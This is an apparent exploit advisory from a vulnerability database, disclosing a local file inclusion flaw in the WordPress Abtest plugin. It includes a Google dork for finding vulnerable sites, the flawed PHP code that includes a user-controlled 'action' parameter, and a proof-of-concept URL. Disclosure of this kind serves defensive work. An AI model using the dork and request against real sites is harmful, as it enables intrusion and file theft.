WordPress Abtest Local File Inclusion

2016.03.22
Credit: CrashBandicot
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion # Date: 2016-03-19 # Google Dork : inurl:/wp-content/plugins/abtest/ # Exploit Author: CrashBandicot # Vendor Homepage: https://github.com/wp-plugins/abtest # Tested on: Chrome # Vulnerable File : abtest_admin.php <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experiments.php'; } ?> # PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI] # Pics : http://i.imgur.com/jZFKYOc.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top